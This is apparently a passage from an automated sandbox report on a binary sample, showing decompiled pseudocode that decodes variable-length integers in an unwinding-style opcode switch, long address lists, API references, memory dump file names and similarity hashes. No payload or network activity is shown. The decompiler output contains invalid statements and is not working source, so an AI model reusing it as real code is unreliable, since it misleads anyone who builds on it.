													 *((intOrPtr*)(__edi + 4 + __esi * 8)) = 0;
												}
												goto L15;
											case 9:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__ebx = __edi;
												_v60 = __esi;
												__edi = 0;
												__ecx = 0;
												__esi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__edi = __edi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__ebx = __esi;
												__esi = _v60;
												_v48 = __edx;
												if(__esi <= 0x11) {
													 *((intOrPtr*)(__ebx + 4 + __esi * 8)) = 2;
													 *(__ebx + __esi * 8) = __edi;
												}
												goto L15;
											case 0xa:
												__esi = _v64;
												__eax = __esi;
												if(__esi == 0) {
													__eax = 0xb0;
													__esp = __esp - E013D6170(0xb0);
													__eax =  &_v73;
													__eax =  &_v73 & 0xfffffff0;
												} else {
													_v64 = __esi;
												}
												__ecx = 0x29;
												__edi = __eax;
												__esi = __ebx;
												__eax = memcpy(__eax, __esi, 0x29 << 2);
												__esi + __ecx = __esi + __ecx + __ecx;
												__ecx = 0;
												 *(__ebx + 0x90) = __eax;
												__ecx = _v48;
												goto L16;
											case 0xb:
												__eax =  *(__ebx + 0x90);
												__ecx = 0x29;
												__edi = __ebx;
												__esi =  *(__ebx + 0x90);
												__eax = memcpy(__ebx, __esi, 0x29 << 2);
												__esi + __ecx = __esi + __ecx + __ecx;
												__ecx = 0;
												__esi = _v64;
												__ecx = _v48;
												_v64 = __eax;
												 *(__eax + 0x90) = _v64;
												goto L16;
											case 0xc:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												 *(__edi + 0x98) = __esi;
												__ecx = 0;
												__esi = 0;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												 *(__edi + 0x94) = __esi;
												__ebx = __edi;
												__ecx = __edx;
												 *((intOrPtr*)(__edi + 0xa0)) = 1;
												goto L16;
											case 0xd:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												 *(__edi + 0x98) = __esi;
												__ebx = __edi;
												__ecx = __edx;
												 *((intOrPtr*)(__edi + 0xa0)) = 1;
												goto L16;
											case 0xe:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												 *(__edi + 0x94) = __esi;
												__ebx = __edi;
												__ecx = __edx;
												goto L16;
											case 0xf:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												 *((intOrPtr*)(__ebx + 0xa0)) = 2;
												 *(__ebx + 0x9c) = __edx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__edx = __esi + __edx;
												__ebx = __edi;
												__ecx = __edx;
												goto L16;
											case 0x10:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												_v48 = __edx;
												__ebx = __edi;
												if(__esi <= 0x11) {
													 *((intOrPtr*)(__edi + 4 + __esi * 8)) = 3;
													 *(__edi + __esi * 8) = __edx;
												}
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__edx = __esi + __edx;
												__ebx = __edi;
												__ecx = __edx;
												goto L16;
											case 0x11:
												__eax = 0;
												__edx = _v48;
												__ecx = 0;
												__edi = 0;
												do {
													__eax =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__eax = __eax & 0x0000007f;
													__esi = (__eax & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__edi = __edi | (__eax & 0x0000007f) << __cl;
												} while (__al < 0);
												__eax = __edi;
												__ecx = 0;
												__edi = 0;
												__esi = __ebx;
												_v60 = __eax;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__edi = __edi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												_a4 = __esi;
												__eax = _v60;
												__esi = __ebx;
												_v48 = __edx;
												__ebx = _a4;
												if(__ecx <= 0x1f && __esi != 0) {
													0xffffffff = 0xffffffff << __cl;
													__edi = __edi | 0xffffffff << __cl;
												}
												__edi = __edi *  *(__ebx + 0xac);
												if(__eax <= 0x11) {
													 *((intOrPtr*)(__ebx + 4 + __eax * 8)) = 1;
													 *(__ebx + __eax * 8) = __edi;
												}
												goto L15;
											case 0x12:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__ebx = __edi;
												 *(__edi + 0x98) = __esi;
												__ecx = 0;
												__edi = 0;
												__esi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__edi = __edi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												_a4 = __esi;
												__esi = __ebx;
												__ebx = _a4;
												_v48 = __edx;
												if(__ecx <= 0x1f && __esi != 0) {
													0xffffffff = 0xffffffff << __cl;
													__edi = __edi | 0xffffffff << __cl;
												}
												__edi = __edi *  *(__ebx + 0xac);
												__ecx = _v48;
												 *((intOrPtr*)(__ebx + 0xa0)) = 1;
												 *(__ebx + 0x94) = __edi;
												goto L16;
											case 0x13:
												__edx = _v48;
												__edi = 0;
												__ecx = 0;
												__esi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__edi = __edi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												_a4 = __esi;
												__esi = __ebx;
												__ebx = _a4;
												_v48 = __edx;
												if(__ecx <= 0x1f && __esi != 0) {
													0xffffffff = 0xffffffff << __cl;
													__edi = __edi | 0xffffffff << __cl;
												}
												__edi = __edi *  *(__ebx + 0xac);
												__ecx = _v48;
												 *(__ebx + 0x94) = __edi;
												goto L16;
											case 0x14:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__ebx = __edi;
												_v60 = __esi;
												__edi = 0;
												__ecx = 0;
												__esi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__edi = __edi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__ebx = __esi;
												__esi = _v60;
												_v48 = __edx;
												__edi = __edi *  *(__ebx + 0xac);
												if(__esi <= 0x11) {
													 *((intOrPtr*)(__ebx + 4 + __esi * 8)) = 4;
													 *(__ebx + __esi * 8) = __edi;
												}
												goto L15;
											case 0x15:
												__eax = 0;
												__edx = _v48;
												__ecx = 0;
												__edi = 0;
												do {
													__eax =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__eax = __eax & 0x0000007f;
													__esi = (__eax & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__edi = __edi | (__eax & 0x0000007f) << __cl;
												} while (__al < 0);
												__eax = __edi;
												__ecx = 0;
												__edi = 0;
												__esi = __ebx;
												_v60 = __eax;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__edi = __edi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												_a4 = __esi;
												__eax = _v60;
												__esi = __ebx;
												_v48 = __edx;
												__ebx = _a4;
												if(__ecx <= 0x1f && __esi != 0) {
													0xffffffff = 0xffffffff << __cl;
													__edi = __edi | 0xffffffff << __cl;
												}
												__edi = __edi *  *(__ebx + 0xac);
												if(__eax <= 0x11) {
													 *((intOrPtr*)(__ebx + 4 + __eax * 8)) = 4;
													 *(__ebx + __eax * 8) = __edi;
												}
												goto L15;
											case 0x16:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												_v48 = __edx;
												__ebx = __edi;
												if(__esi <= 0x11) {
													 *((intOrPtr*)(__edi + 4 + __esi * 8)) = 5;
													 *(__edi + __esi * 8) = __edx;
												}
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__edx = __esi + __edx;
												__ebx = __edi;
												__ecx = __edx;
												goto L16;
											case 0x17:
												goto L131;
											case 0x18:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__eax = _v68;
												__ecx = __edx;
												__ebx = __edi;
												 *(_v68 + 0x68) = __esi;
												L16:
												__eax = _v56;
												if(__ecx < _v56) {
													goto L8;
												} else {
													goto L17;
												}
												goto L153;
											case 0x19:
												__edx = _v48;
												__esi = 0;
												__ecx = 0;
												__edi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__esi = __esi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__ebx = __edi;
												_v60 = __esi;
												__edi = 0;
												__ecx = 0;
												__esi = __ebx;
												do {
													__ebx =  *__edx & 0x000000ff;
													__edx = __edx + 1;
													__ebx = __ebx & 0x0000007f;
													__eax = (__ebx & 0x0000007f) << __cl;
													__ecx = __ecx + 7;
													__edi = __edi | (__ebx & 0x0000007f) << __cl;
												} while (__bl < 0);
												__ebx = __esi;
												__esi = _v60;
												_v48 = __edx;
												__edi = __edi *  *(__ebx + 0xac);
												if(__esi <= 0x11) {
													__edi =  ~__edi;
													 *((intOrPtr*)(__ebx + 4 + __esi * 8)) = 1;
													 *(__ebx + __esi * 8) = __edi;
												}
												goto L15;
										}
									}
								}
							}
						}
						goto L153;
					}
					goto L17;
				}
				L153:
			}

0x013d7426
0x013d7428
0x013d742b
0x013d742e
0x013d7431
0x013d7434
0x013d7440
0x013d74bc
0x013d74c3
0x013d7442
0x013d7442
0x013d7445
0x013d744c
0x013d744f
0x013d7452
0x013d7455
0x013d7457
0x013d745a
0x013d7460
0x013d7460
0x013d7460
0x013d7466
0x013d746b
0x00000000
0x00000000
0x013d746d
0x013d746d
0x013d7470
0x013d7473
0x013d7478
0x013d747b
0x013d7480
0x013d74a0
0x013d74a3
0x013d74ac
0x00000000
0x013d7482
0x013d7485
0x013d74e0
0x013d74e2
0x013d74e5
0x013d74e8
0x013d74eb
0x013d74ee
0x013d74f1
0x013d74f3
0x013d74f8
0x013d74f8
0x013d74fb
0x013d7500
0x013d7503
0x013d7505
0x013d7508
0x013d750a
0x013d750e
0x013d7511
0x013d7514
0x013d7517
0x013d7519
0x013d7523
0x013d7525
0x013d752d
0x013d752d
0x00000000
0x013d7487
0x013d748a
0x013d74c8
0x013d74ca
0x013d74cd
0x013d74d3
0x013d74d5
0x013d74d5
0x00000000
0x013d748c
0x013d748e
0x0147aa0a
0x0147aa0a
0x0147aa0f
0x0147aa14
0x0147aa19
0x0147aa1e
0x0147aa23
0x0147aa28
0x0147aa2d
0x0147aa32
0x0147aa37
0x0147aa3c
0x0147aa44
0x0147aa49
0x0147aa4e
0x0147aa53
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x013d7494
0x013d7494
0x00000000
0x013d74b2
0x013d74b2
0x00000000
0x00000000
0x013d7571
0x013d7578
0x013d7578
0x013d757b
0x013d757e
0x013d7581
0x013d7583
0x013d758b
0x013d758d
0x013d7590
0x00000000
0x00000000
0x013d759b
0x013d759f
0x013d75a6
0x013d75ab
0x00000000
0x00000000
0x013d75b6
0x013d75ba
0x013d75c1
0x013d75c6
0x00000000
0x00000000
0x013d75d1
0x013d75d7
0x013d75db
0x013d75e0
0x00000000
0x00000000
0x013d7a7d
0x013d7a80
0x013d7a82
0x013d7a84
0x013d7a90
0x013d7a90
0x013d7a93
0x013d7a98
0x013d7a9b
0x013d7a9d
0x013d7aa0
0x013d7aa2
0x013d7aa6
0x013d7aa8
0x013d7aab
0x013d7aad
0x013d7aaf
0x013d7ab8
0x013d7ab8
0x013d7abb
0x013d7ac0
0x013d7ac3
0x013d7ac5
0x013d7ac8
0x013d7aca
0x013d7ace
0x013d7ad0
0x013d7ad3
0x013d7ad6
0x013d7ae0
0x013d7ae6
0x013d7aee
0x013d7aee
0x00000000
0x00000000
0x013d7af6
0x013d7af9
0x013d7afb
0x013d7afd
0x013d7b00
0x013d7b00
0x013d7b03
0x013d7b08
0x013d7b0b
0x013d7b0d
0x013d7b10
0x013d7b12
0x00000000
0x00000000
0x013d7ba5
0x013d7ba8
0x013d7baa
0x013d7bac
0x013d7bb0
0x013d7bb0
0x013d7bb3
0x013d7bb8
0x013d7bbb
0x013d7bbd
0x013d7bc0
0x013d7bc2
0x013d7bc6
0x013d7bc9
0x013d7bce
0x013d7bd4
0x013d7bd4
0x00000000
0x00000000
0x013d7be1
0x013d7be4
0x013d7be6
0x013d7be8
0x013d7bf0
0x013d7bf0
0x013d7bf3
0x013d7bf8
0x013d7bfb
0x013d7bfd
0x013d7c00
0x013d7c02
0x013d7b16
0x013d7b16
0x013d7b19
0x013d7b1e
0x013d7b24
0x013d7b24
0x00000000
0x00000000
0x013d7c0b
0x013d7c0e
0x013d7c10
0x013d7c12
0x013d7c18
0x013d7c18
0x013d7c1b
0x013d7c20
0x013d7c23
0x013d7c25
0x013d7c28
0x013d7c2a
0x013d7c2e
0x013d7c30
0x013d7c33
0x013d7c35
0x013d7c37
0x013d7c40
0x013d7c40
0x013d7c43
0x013d7c48
0x013d7c4b
0x013d7c4d
0x013d7c50
0x013d7c52
0x013d7c56
0x013d7c58
0x013d7c5b
0x013d7c61
0x013d7c67
0x013d7c6f
0x013d7c6f
0x00000000
0x00000000
0x013d75eb
0x013d75ee
0x013d75f2
0x013d7c93
0x013d7c9d
0x013d7c9f
0x013d7ca3
0x013d75f8
0x013d75fe
0x013d75fe
0x013d7601
0x013d7606
0x013d7608
0x013d760a
0x013d760a
0x013d760a
0x013d760c
0x013d7612
0x00000000
0x00000000
0x013d761a
0x013d7620
0x013d7625
0x013d7627
0x013d7629
0x013d7629
0x013d7629
0x013d762b
0x013d762e
0x013d7631
0x013d7634
0x00000000
0x00000000
0x013d763f
0x013d7642
0x013d7644
0x013d7646
0x013d7650
0x013d7650
0x013d7653
0x013d7658
0x013d765b
0x013d765d
0x013d7660
0x013d7662
0x013d7666
0x013d766c
0x013d766e
0x013d7670
0x013d7670
0x013d7673
0x013d7678
0x013d767b
0x013d767d
0x013d7680
0x013d7682
0x013d7686
0x013d768c
0x013d768e
0x013d7690
0x00000000
0x00000000
0x013d7b31
0x013d7b34
0x013d7b36
0x013d7b38
0x013d7b40
0x013d7b40
0x013d7b43
0x013d7b48
0x013d7b4b
0x013d7b4d
0x013d7b50
0x013d7b52
0x013d7b56
0x013d7b5c
0x013d7b5e
0x013d7b60
0x00000000
0x00000000
0x013d7b6f
0x013d7b72
0x013d7b74
0x013d7b76
0x013d7b80
0x013d7b80
0x013d7b83
0x013d7b88
0x013d7b8b
0x013d7b8d
0x013d7b90
0x013d7b92
0x013d7b96
0x013d7b9c
0x013d7b9e
0x00000000
0x00000000
0x013d7532
0x013d7535
0x013d7537
0x013d7539
0x013d753b
0x013d7545
0x013d7550
0x013d7550
0x013d7553
0x013d7558
0x013d755b
0x013d755d
0x013d7560
0x013d7562
0x013d7566
0x013d7568
0x013d756a
0x00000000
0x00000000
0x013d7718
0x013d771b
0x013d771d
0x013d771f
0x013d7728
0x013d7728
0x013d772b
0x013d7730
0x013d7733
0x013d7735
0x013d7738
0x013d773a
0x013d773e
0x013d7741
0x013d7746
0x013d7748
0x013d7750
0x013d7750
0x013d7753
0x013d7756
0x013d7758
0x013d775a
0x013d7760
0x013d7760
0x013d7763
0x013d7768
0x013d776b
0x013d776d
0x013d7770
0x013d7772
0x013d7776
0x013d7778
0x013d777a
0x00000000
0x00000000
0x013d7781
0x013d7783
0x013d7786
0x013d7788
0x013d7790
0x013d7790
0x013d7793
0x013d7798
0x013d779b
0x013d779d
0x013d77a0
0x013d77a2
0x013d77a6
0x013d77a8
0x013d77aa
0x013d77ac
0x013d77ae
0x013d77b8
0x013d77b8
0x013d77bb
0x013d77c0
0x013d77c3
0x013d77c5
0x013d77c8
0x013d77ca
0x013d77ce
0x013d77d1
0x013d77d4
0x013d77d6
0x013d77d9
0x013d77df
0x013d7c8a
0x013d7c8c
0x013d7c8c
0x013d77ea
0x013d77f4
0x013d77fa
0x013d7802
0x013d7802
0x00000000
0x00000000
0x013d780a
0x013d780d
0x013d780f
0x013d7811
0x013d7818
0x013d7818
0x013d781b
0x013d7820
0x013d7823
0x013d7825
0x013d7828
0x013d782a
0x013d782e
0x013d7830
0x013d7836
0x013d7838
0x013d783a
0x013d7840
0x013d7840
0x013d7843
0x013d7848
0x013d784b
0x013d784d
0x013d7850
0x013d7852
0x013d7856
0x013d7859
0x013d785b
0x013d785e
0x013d7864
0x013d7870
0x013d7872
0x013d7872
0x013d7874
0x013d787b
0x013d787e
0x013d7888
0x00000000
0x00000000
0x013d7893
0x013d7896
0x013d7898
0x013d789a
0x013d78a0
0x013d78a0
0x013d78a3
0x013d78a8
0x013d78ab
0x013d78ad
0x013d78b0
0x013d78b2
0x013d78b6
0x013d78b9
0x013d78bb
0x013d78be
0x013d78c4
0x013d78d0
0x013d78d2
0x013d78d2
0x013d78d4
0x013d78db
0x013d78de
0x00000000
0x00000000
0x013d7972
0x013d7975
0x013d7977
0x013d7979
0x013d7980
0x013d7980
0x013d7983
0x013d7988
0x013d798b
0x013d798d
0x013d7990
0x013d7992
0x013d7996
0x013d7998
0x013d799b
0x013d799d
0x013d799f
0x013d79a8
0x013d79a8
0x013d79ab
0x013d79b0
0x013d79b3
0x013d79b5
0x013d79b8
0x013d79ba
0x013d79be
0x013d79c0
0x013d79c3
0x013d79c6
0x013d79d0
0x013d79d6
0x013d79de
0x013d79de
0x00000000
0x00000000
0x013d78e9
0x013d78eb
0x013d78ee
0x013d78f0
0x013d78f8
0x013d78f8
0x013d78fb
0x013d7900
0x013d7903
0x013d7905
0x013d7908
0x013d790a
0x013d790e
0x013d7910
0x013d7912
0x013d7914
0x013d7916
0x013d7920
0x013d7920
0x013d7923
0x013d7928
0x013d792b
0x013d792d
0x013d7930
0x013d7932
0x013d7936
0x013d7939
0x013d793c
0x013d793e
0x013d7941
0x013d7947
0x013d7c7c
0x013d7c7e
0x013d7c7e
0x013d7952
0x013d795c
0x013d7962
0x013d796a
0x013d796a
0x00000000
0x00000000
0x013d79e6
0x013d79e9
0x013d79eb
0x013d79ed
0x013d79f0
0x013d79f0
0x013d79f3
0x013d79f8
0x013d79fb
0x013d79fd
0x013d7a00
0x013d7a02
0x013d7a06
0x013d7a09
0x013d7a0e
0x013d7a10
0x013d7a18
0x013d7a18
0x013d7a1b
0x013d7a1e
0x013d7a20
0x013d7a22
0x013d7a28
0x013d7a28
0x013d7a2b
0x013d7a30
0x013d7a33
0x013d7a35
0x013d7a38
0x013d7a3a
0x013d7a3e
0x013d7a40
0x013d7a42
0x00000000
0x00000000
0x00000000
0x00000000
0x013d7a49
0x013d7a4c
0x013d7a4e
0x013d7a50
0x013d7a58
0x013d7a58
0x013d7a5b
0x013d7a60
0x013d7a63
0x013d7a65
0x013d7a68
0x013d7a6a
0x013d7a6e
0x013d7a71
0x013d7a73
0x013d7a75
0x013d74b5
0x013d74b5
0x013d74ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013d769f
0x013d76a2
0x013d76a4
0x013d76a6
0x013d76b0
0x013d76b0
0x013d76b3
0x013d76b8
0x013d76bb
0x013d76bd
0x013d76c0
0x013d76c2
0x013d76c6
0x013d76c8
0x013d76cb
0x013d76cd
0x013d76cf
0x013d76d8
0x013d76d8
0x013d76db
0x013d76e0
0x013d76e3
0x013d76e5
0x013d76e8
0x013d76ea
0x013d76ee
0x013d76f0
0x013d76f3
0x013d76f6
0x013d7700
0x013d7706
0x013d7708
0x013d7710
0x013d7710
0x00000000
0x00000000
0x013d7494
0x013d748e
0x013d748a
0x013d7485
0x00000000
0x013d7480
0x00000000
0x013d7460
0x00000000

APIs

abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0A
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0F
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA14
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA19
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA1E
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA23
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bf1280cfa11928d16ba52a5853a058d930ec6ca781aba8a2fb62ba60852f5dc4
Instruction ID: b9ad0c389d7a12642084fc8be9736abdede95aa227ba6bc96b12d6f13a61b0ef
Opcode Fuzzy Hash: bf1280cfa11928d16ba52a5853a058d930ec6ca781aba8a2fb62ba60852f5dc4
Instruction Fuzzy Hash: EC418EB2A002198FCB05CF68D4C57A9FBF5BF4934CF58816AE959AF382D33598418B61

Uniqueness

Uniqueness Score: -1.00%

Function 013D8320 Relevance: 31.6, APIs: 21, Instructions: 126sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 013D7CB0: strlen.MSVCRT ref: 013D7D2D

Sleep.KERNEL32 ref: 013D8487
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA14
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA19
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA1E
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA23
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
